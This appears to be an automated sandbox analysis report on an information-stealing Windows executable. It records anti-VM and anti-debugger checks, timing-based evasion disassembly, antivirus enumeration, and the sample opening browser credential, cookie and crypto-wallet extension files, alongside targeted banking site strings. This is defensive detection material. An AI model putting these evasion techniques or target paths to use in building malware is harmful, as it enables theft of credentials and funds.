                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0BF6 second address: 55E0C83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F450CC4AB27h 0x00000009 add eax, 29243AAEh 0x0000000f jmp 00007F450CC4AB29h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F450CC4AB20h 0x0000001b add cx, 5428h 0x00000020 jmp 00007F450CC4AB1Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jmp 00007F450CC4AB29h 0x00000032 mov eax, dword ptr [eax] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F450CC4AB1Ch 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0D12 second address: 55E0D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0D16 second address: 55E0D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0D1A second address: 55E0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0D74 second address: 55E0D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F09B9 second address: 55F09BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F09BD second address: 55F09C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F09C3 second address: 55F09C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F09C9 second address: 55F09CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F09CD second address: 55F09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F09D1 second address: 55F0A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F450CC4AB20h 0x0000000e push eax 0x0000000f pushad 0x00000010 call 00007F450CC4AB21h 0x00000015 jmp 00007F450CC4AB20h 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F450CC4AB1Bh 0x00000021 xor esi, 3ECFC08Eh 0x00000027 jmp 00007F450CC4AB29h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A42 second address: 55F0A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A55 second address: 55F0A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F450CC4AB1Eh 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F450CC4AB1Dh 0x00000019 pop eax 0x0000001a mov ebx, 0F64E074h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A9A second address: 55F0AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F450CC4A60Bh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0AB9 second address: 55F0B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop edi 0x00000006 popad 0x00000007 mov di, si 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e jmp 00007F450CC4AB26h 0x00000013 test esi, esi 0x00000015 jmp 00007F450CC4AB20h 0x0000001a je 00007F457D0E83DEh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F450CC4AB27h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0B0E second address: 55F0B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F450CC4A60Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0B41 second address: 55F0B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F457D100457h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F450CC4AB23h 0x00000016 jmp 00007F450CC4AB23h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F450CC4AB25h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0B9E second address: 55F0BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4A612h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0BBB second address: 55F0BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0BC1 second address: 55F0BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0BC5 second address: 55F0BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB24h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E53277 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CA608E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E6442E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EE184C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA80CB rdtsc 0_2_00CA80CB
                Source: C:\Users\user\Desktop\file.exe TID: 4052Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 3252Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: file.exe, file.exe, 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005FA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: file.exe, 00000000.00000003.2268418527.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271288090.000000000167E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: file.exe, 00000000.00000003.2119556889.0000000005FA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: file.exe, 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: file.exe, 00000000.00000003.2119556889.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA80CB rdtsc 0_2_00CA80CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8B480 LdrInitializeThunk,0_2_00C8B480
                Source: file.exe, file.exe, 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213166476.0000000001743000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270461946.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271651117.0000000001759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2876, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: file.exe, 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: file.exe, 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: file.exe, 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: file.exe, 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: file.exe, 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletm
                Source: file.exe, 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: file.exe, 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: file.exe, 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
